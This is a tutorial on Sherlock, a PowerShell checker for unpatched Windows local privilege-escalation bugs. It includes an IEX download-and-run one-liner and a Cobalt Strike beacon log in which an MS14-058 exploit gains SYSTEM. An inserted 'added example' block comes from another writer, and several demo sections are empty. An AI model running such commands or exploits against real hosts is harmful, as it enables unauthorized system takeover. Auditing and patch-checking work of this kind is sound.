An in-depth analysis and usage tutorial for the vulnerability detection tool Sherlock

0x01 Introduction to Sherlock

Sherlock is a PowerShell script that checks a Windows host for local privilege escalation vulnerabilities.

It currently covers the following vulnerabilities:

MS10-015 : User Mode to Ring (KiTrap0D)
MS10-092 : Task Scheduler
MS13-053 : NTUserMessageCall Win32k Kernel Pool Overflow
MS13-081 : TrackPopupMenuEx Win32k NULL Page
MS14-058 : TrackPopupMenu Win32k Null Pointer Dereference
MS15-051 : ClientCopyImage Win32k
MS15-078 : Font Driver Buffer Overflow
MS16-016 : 'mrxdav.sys' WebDAV
MS16-032 : Secondary Logon Handle

0x02 Basic usage

Load the script locally:

Import-Module Sherlock.ps1

Load the script remotely:

IEX (New-Object System.Net.Webclient).DownloadString('https://raw.githubusercontent.com/rasta-mouse/Sherlock/master/Sherlock.ps1')

Find vulnerabilities:

PS C:\Users\Administrator> Find-AllVulns

Title : User Mode to Ring (KiTrap0D)
MSBulletin : MS10-015
CVEID : 2010-0232
Link : https://www.exploit-db.com/exploits/11199/
VulnStatus : Not supported on 64-bit systems

Title : Task Scheduler .XML
MSBulletin : MS10-092
CVEID : 2010-3338, 2010-3888
Link : https://www.exploit-db.com/exploits/19930/
VulnStatus : Not Vulnerable

Title : NTUserMessageCall Win32k Kernel Pool Overflow
MSBulletin : MS13-053
CVEID : 2013-1300
Link : https://www.exploit-db.com/exploits/33213/
VulnStatus : Not supported on 64-bit systems

Title : TrackPopupMenuEx Win32k NULL Page
MSBulletin : MS13-081
CVEID : 2013-3881
Link : https://www.exploit-db.com/exploits/31576/
VulnStatus : Not supported on 64-bit systems

Title : TrackPopupMenu Win32k Null Pointer Dereference
MSBulletin : MS14-058
CVEID : 2014-4113
Link : https://www.exploit-db.com/exploits/35101/
VulnStatus : Appears Vulnerable

Title : ClientCopyImage Win32k
MSBulletin : MS15-051
CVEID : 2015-1701, 2015-2433
Link : https://www.exploit-db.com/exploits/37367/
VulnStatus : Appears Vulnerable

Title : Font Driver Buffer Overflow
MSBulletin : MS15-078
CVEID : 2015-2426, 2015-2433
Link : https://www.exploit-db.com/exploits/38222/
VulnStatus : Not Vulnerable

Title : 'mrxdav.sys' WebDAV
MSBulletin : MS16-016
CVEID : 2016-0051
Link : https://www.exploit-db.com/exploits/40085/
VulnStatus : Not supported on 64-bit systems

Title : Secondary Logon Handle
MSBulletin : MS16-032
CVEID : 2016-0099
Link : https://www.exploit-db.com/exploits/39719/
VulnStatus : Appears Vulnerable

A VulnStatus of Appears Vulnerable means the check matched, i.e. the vulnerability appears to be present on this host.

Verification:

PS C:\Users\Administrator> elevate ms14-058 smb
[*] Tasked beacon to elevate and spawn windows/beacon_smb/bind_pipe (127.0.0.1:1337)
[+] host called home, sent: 105015 bytes
[+] received output:
[*] Getting Windows version...
[*] Solving symbols...
[*] Requesting Kernel loaded modules...
[*] pZwQuerySystemInformation required length 51216
[*] Parsing SYSTEM_INFO...
[*] 173 Kernel modules found
[*] Checking module \SystemRoot\system32\ntoskrnl.exe
[*] Good! nt found as ntoskrnl.exe at 0x0264f000
[*] ntoskrnl.exe loaded in userspace at: 40000000
[*] pPsLookupProcessByProcessId in kernel: 0xFFFFF800029A21FC
[*] pPsReferencePrimaryToken in kernel: 0xFFFFF800029A59D0
[*] Registering class...
[*] Creating window...
[*] Allocating null page...
[*] Getting PtiCurrent...
[*] Good! dwThreadInfoPtr 0xFFFFF900C1E7B8B0
[*] Creating a fake structure at NULL...
[*] Triggering vulnerability...
[!] Executing payload...
[+] host called home, sent: 204885 bytes
[+] established link to child beacon: 192.168.56.105
[+] established link to parent beacon: 192.168.56.105

beacon> getuid
[*] Tasked beacon to get userid
[+] host called home, sent: 8 bytes
[*] You are NT AUTHORITY\SYSTEM (admin)

The privilege escalation succeeded. Note that Sherlock only checks whether the vulnerability is present; it does not exploit it for you.

0x03 Hidden tricks

Beyond the basic functionality above, the script also contains a few small features that the author does not document.

Getting a file's version

Sherlock can also report the version number of a file; just run the Get-FileVersionInfo command.

Demo:

Getting the CPU architecture

Run the Get-Architecture command to find out whether the CPU architecture is 32-bit or 64-bit.

Demo:

0x04 How Sherlock's vulnerability checks work

Besides the vulnerabilities the author has already added, we can add the ones we are interested in ourselves. Before adding a vulnerability, let's first analyse how Sherlock's checks work.

In Sherlock, each vulnerability check module is a function, of the following form:

function Find-MS16032 {
}

The module first calls Get-Architecture to get the system architecture and checks whether that architecture is affected by the privilege escalation vulnerability; only if it is does the check proceed.

if ( $Architecture[1] -eq "AMD64" -or $Architecture[0] -eq "32-bit" )

Next, Get-FileVersionInfo reads the version information of the vulnerable file; the check mainly uses the last two numbers (build and revision).

After that it is simple: a switch plus if compares the versions:

switch ( $Build ) {
    7600 { if ( $Revision -ge "16000" ) { $VulnStatus = "Appears Vulnerable" } }
    7601 { if ( $Revision -le "23348" ) { $VulnStatus = "Appears Vulnerable" } }
    9200 { if ( $Revision -le "21768" ) { $VulnStatus = "Appears Vulnerable" } }
    9600 { if ( $Revision -le "18230" ) { $VulnStatus = "Appears Vulnerable" } }
    10240 { if ( $Revision -le "16724" ) { $VulnStatus = "Appears Vulnerable" } }
    10586 { if ( $Revision -le "162" ) { $VulnStatus = "Appears Vulnerable" } }
    default { $VulnStatus = "Not Vulnerable" }
}

Adding our own vulnerability is then easy: add the vulnerability's information in function New-ExploitTable.

As a test, let's first create a function Find-MS16135:

function Find-MS16135 {
    $MSBulletin = "MS16-135"
    $VulnStatus = "Appears Vulnerable"
    Set-ExploitTable $MSBulletin $VulnStatus
}

Then add Find-MS16135 to function Find-AllVulns and we're done.
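As an added example (not Sherlock's own code and not from the original post), here is a Find-* module in the same shape as the ones above, with the build/revision comparison actually performed rather than hard-coded to "Appears Vulnerable". It assumes the page's helpers Get-Architecture, Get-FileVersionInfo (taking a path and returning a dotted "major.minor.build.revision" string) and Set-ExploitTable are loaded, and that seclogon.dll is the file whose version the MS16-032 fix changes; the thresholds are the ones in the switch block above.

```powershell
# Added example, not code from the Sherlock project. Assumes Get-Architecture,
# Get-FileVersionInfo (path in, "a.b.c.d" string out) and Set-ExploitTable from
# the page are loaded. seclogon.dll as the checked file is an assumption.

function Get-VulnStatusFromVersion {
    param(
        [Parameter(Mandatory)] [string]    $Version,     # e.g. "6.1.7601.23348"
        [Parameter(Mandatory)] [hashtable] $Vulnerable   # build -> { param($r) <bool> }
    )
    $Parts = $Version.Split(".")
    if ($Parts.Count -lt 4) { return "Not Vulnerable" }   # unparsable: do not claim a hit
    # Cast to [int] so -le/-ge compare numerically. Left as the strings Split
    # returns, "1600" -le "162" is $true because the comparison is lexical.
    $Build    = [int]$Parts[2]
    $Revision = [int]($Parts[3].Split(" ")[0])           # drop any trailing build-branch text
    if ($Vulnerable.ContainsKey($Build) -and (& $Vulnerable[$Build] $Revision)) {
        return "Appears Vulnerable"
    }
    return "Not Vulnerable"
}

# Same build/revision thresholds as the page's switch block, one entry per build.
$MS16032Builds = @{
    7600  = { param($r) $r -ge 16000 }
    7601  = { param($r) $r -le 23348 }
    9200  = { param($r) $r -le 21768 }
    9600  = { param($r) $r -le 18230 }
    10240 = { param($r) $r -le 16724 }
    10586 = { param($r) $r -le 162 }
}

function Find-MS16032Numeric {
    # A Find-* module in Sherlock's shape: architecture gate, file version, table lookup.
    $MSBulletin = "MS16-032"
    $Architecture = Get-Architecture
    if ( $Architecture[1] -eq "AMD64" -or $Architecture[0] -eq "32-bit" ) {
        $Version = Get-FileVersionInfo ($env:windir + "\system32\seclogon.dll")  # assumed file
        $VulnStatus = Get-VulnStatusFromVersion -Version $Version -Vulnerable $MS16032Builds
    } else {
        $VulnStatus = "Not supported on this architecture"
    }
    Set-ExploitTable $MSBulletin $VulnStatus
}

# Offline check with constructed version strings (no file is read):
Get-VulnStatusFromVersion "6.1.7601.23348"  $MS16032Builds
Get-VulnStatusFromVersion "6.1.7601.23349"  $MS16032Builds
Get-VulnStatusFromVersion "10.0.10586.1600" $MS16032Builds
```

The last constructed case, revision 1600 on build 10586, is one where comparing the revision as a string gives the opposite answer from the numeric comparison, which is why the helper casts to [int] before comparing.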

Let's test it:

0x05 Summary

That is the overall idea of the framework. The next step is for readers to find the file versions that carry each vulnerability; I don't yet have a good way to quickly locate vulnerable file versions, so if anyone has a good approach, please share it.

Project: https://github.com/rasta-mouse/Sherlock